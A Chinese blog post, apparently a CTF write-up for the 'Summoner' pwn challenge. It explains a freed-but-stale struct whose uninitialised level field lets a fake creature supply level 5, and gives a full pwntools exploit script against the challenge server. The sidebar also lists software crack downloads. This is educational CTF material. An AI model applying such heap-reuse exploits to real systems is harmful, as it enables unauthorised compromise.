metasequoia :Summoner

最新推荐文章于 2024-07-12 15:53:09 发布
最新推荐文章于 2024-07-12 15:53:09 发布
阅读量237 收藏
点赞数
分类专栏: CTF 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/chennbnbnb/article/details/104414151
版权

在这里插入图片描述

结构体

struct Creature{
	char* name;
    unsigned int level;
};

思路

在这里插入图片描述

  • level为5时即可
    在这里插入图片描述

  • 但是写入限制了level只能为4

漏洞

在这里插入图片描述

  • 只释放了申请的name,然后把creature设为NULL,没有释放creature
  • 并且申请creature时没有清空level

在这里插入图片描述

  • 使用前没有初始化level, 可以现在name中写入一个假的creature,再释放,使得再次申请Craeture时level正好为之前的5

exp

from pwn import *
#context.log_level = 'debug'
context(os='linux', arch='amd64')
elf=ELF('./a.dms')
#sh=process('./a.dms')
sh=remote('ctf.metasequoia.tk', 29579)
#gdb.attach(sh)

def cmd(s):
	sh.recvuntil('> ')
	sh.sendline(s)

def summon(name):
	cmd('summon '+name)
	sh.recvuntil('"\n')

def release():
	cmd('release')
	sh.recvuntil('Released.\n')

def strike():
	cmd('strike')

fakeCreature='A'*8+p64(5)

summon(fakeCreature)
release()
summon('chh')
strike()

sh.interactive()
一只狗20000402
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
从pwn-summoner理解first fit
weixin_44864859的博客
07-06 309
本文主要为观看bili53448916889师傅讲解视频的学习笔记。 首先拖进ida中进行代码审计。以下是main函数的伪代码 __int64 __fastcall main(__int64 a1, char **a2, char **a3) { const char *v3; // rsi char **v5; // [rsp+0h] [rbp-240h] unsigned int level; // [rsp+1Ch] [rbp-224h] void **v7; // [rsp+20h]
ctf-pwn:canary绕过
chennbnbnb的博客
01-19 2959
文章目录覆盖00字符读出canary原理利用条件漏洞代码编译选项EXP利用格式化字符串漏洞读出canary原理漏洞代码编译选项EXP逐字节猜解canary原理漏洞代码编译EXPSSP Leak原理 覆盖00字符读出canary 原理 canary的值设计为以0x00结尾,防止read,printf灯函数直接读出 通过栈溢出覆盖最低位的字节,从而获得canary 利用条件 存在read/pri...
buuoj Pwn writeup 286-290
yongbaoii的博客
09-06 228
286 metasequoia_2020_blacksmith 287 secretHolder_hitcon_2016 288 pwnable_dubblesort 289 pwnable_applestore 290 xp0intctf_2018_tutorial1
buuoj Pwn writeup 206-210
yongbaoii的博客
08-31 456
206 ciscn_2019_c_3 一堆乱七八糟。 create 207 metasequoia_2020_summoner 208 linkctf_2018.7_babypie 209 wdb_2018_3rd_pesp 210 TWCTF_online_2019_asterisk_alloc
MetaseQuoia3D模型设计Crack
q2315702359的博客
03-22 75
MetaseQuoia是一个专门为3D模型设计的程序,现在所有有兴趣以不同格式创建自己的模型的人都可以满足他们的需求。该软件不是超级专业人士使用的,但它似乎是该领域更复杂实用程序的一个很好的替代品,特别是因为它易于使用,并对该软件能够处理的各种格式提供了良好的支持。各种进出口格式,如DXF、LWO、3DS、COB、OBJ等。的支持,但先进人士不会认为这是一个问题。从初学者到专业人士的许多有用功能。您可以使用SDK创建的插件。
Metasequoia Ver3.1
01-16
Metasequoia是基于多边形建模创建使用CAD和3DCG,如游戏制作的三性维形状数据。重视效率和数据的可移植,可以使用范围很广,从爱好到业务
(Metasequoia)水杉建模4.64,破解补丁
07-08
把这个文件直接放在安装好的根目录下面,不用替换(仅用于 64位)
Metasequoia是基于多边形建模
01-16
**Metasequoia** 是一款专门用于多边形建模的软件,它在3D建模领域中扮演着重要的角色,特别是在计算机辅助设计(CAD)和三维计算机图形(3DCG)应用中,如游戏开发。多边形建模是3D建模的基本方法之一,通过组合和...
Metasequoia 2.4.8 繁体版
10-29
Metasequoia 2.4.8 繁体版》是一款专为繁体用户设计的图形编辑软件,它在网络上的繁体版本相对稀缺,因此对于习惯使用繁体中文的用户来说,这款软件尤为珍贵。该软件的主要功能是进行三维建模和动画制作,其界面...
水杉软件 Metasequoia 汉化中文版
05-19
Metasequoia是基于多边形建模创建使用CAD和3DCG,如游戏制作的三性维形状数据。重视效率和数据的可移植,可以使用范围很广,从爱好到业务。 1、强大的建模功能 水杉具有基本的多边形编辑功能。它还具有协助更精细...
如何从libc地址得到栈地址
chennbnbnb的博客
01-19 2273
在libc中保存了一个函数叫_environ,存的是当前进程的环境变量 得到libc地址后,libc基址+_environ的偏移量=_environ的地址 在内存布局中,他们同属于一个段,开启ASLR之后相对位置不变,偏移量之和libc库有关 通过_environ的地址得到_environ的值,从而得到环境变量地址,环境变量保存在栈中,所以通过栈内的偏移量,可以访问栈中任意变量 ...
scanf源码分析
chennbnbnb的博客
12-02 1167
本文分析的是glibc2.31中的scanf相关源码,目的不是研究scanf的算法,而是说明scanf在IO attack中的利用方法,属于CTF的范畴 scanf.c 其实就是对__vscanf_internal的封装 __scanf (const char *format, ...) { va_list arg; int done; va_start (arg, format); done = __vfscanf_internal (stdin, format, arg, 0)
栈迁移/栈劫持
chennbnbnb的博客
01-30 1010
例子 https://github.com/scwuaptx/HITCON-Training/tree/master/LAB/lab6 #include <stdio.h> #include <stdlib.h> #include <unistd.h> int count = 1337 ; int main(){ if(count != 13...
ASLR与PIE
chennbnbnb的博客
01-14 805
全称 ASLR:Address Space Layout Randomization PIE:Position Independent Executables 作用 ASLR:随机放置关键数据的地址空间,放置攻击者跳转到内存特定位置 PIE:生成相对寻址的位置无关的可执行程序 谁实现? ASLR:操作系统 cat /proc/sys/kernel/randomize_va_space:...
linux系统调用
chennbnbnb的博客
01-19 185
系统调用过程 32位 64位 系统调用号表 格式: #define __NR_名字 number 32位 cat /usr/include/asm/unistd_32.h #ifndef _ASM_X86_UNISTD_32_H #define _ASM_X86_UNISTD_32_H 1 #define __NR_restart_syscall 0 #define __NR_ex...
移动互联安全扩展要求测评项
hakksjss的博客
07-10 1109
应为无线接入设备的安装选择合理位置,避免过度覆盖和电磁干扰。无线接入设备的安装位置选择不当,易被攻击者利用,特别是攻击者会通过无线信号过度覆盖的弱点进行无线渗透攻击,因此要选择合理的位置安装无线接入设备。
车载视频监控管理方案:无人驾驶出租车安全出行的保障
最新发布
TSINGSEE青犀视频官方技术博客
07-12 704
为了确保数据的安全性和可靠性,本方案采用云存储技术,将车辆视频数据和相关信息存储在云端。
中小学校园EasyCVR视频综合监管方案:构建安全、智能的校园环境
TSINGSEE青犀视频官方技术博客
07-10 1142
针对校园食堂后厨、仓库、配菜、清洗等监控区域的环境卫生与安全等进行全面的监管,及时发现违规异常情况,并能向监管人员及时发送告警信息,保障在校师生的食品与饮食安全
metasequoia设置语言
07-11
Metasequoia中设置语言非常简单。首先,打开Metasequoia软件。然后,点击顶部菜单栏的“文件”(File)选项,选择“选项”(Options)。 在弹出的选项对话框中,有一个“语言”(Language)选项,点击它。这将展示一个...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值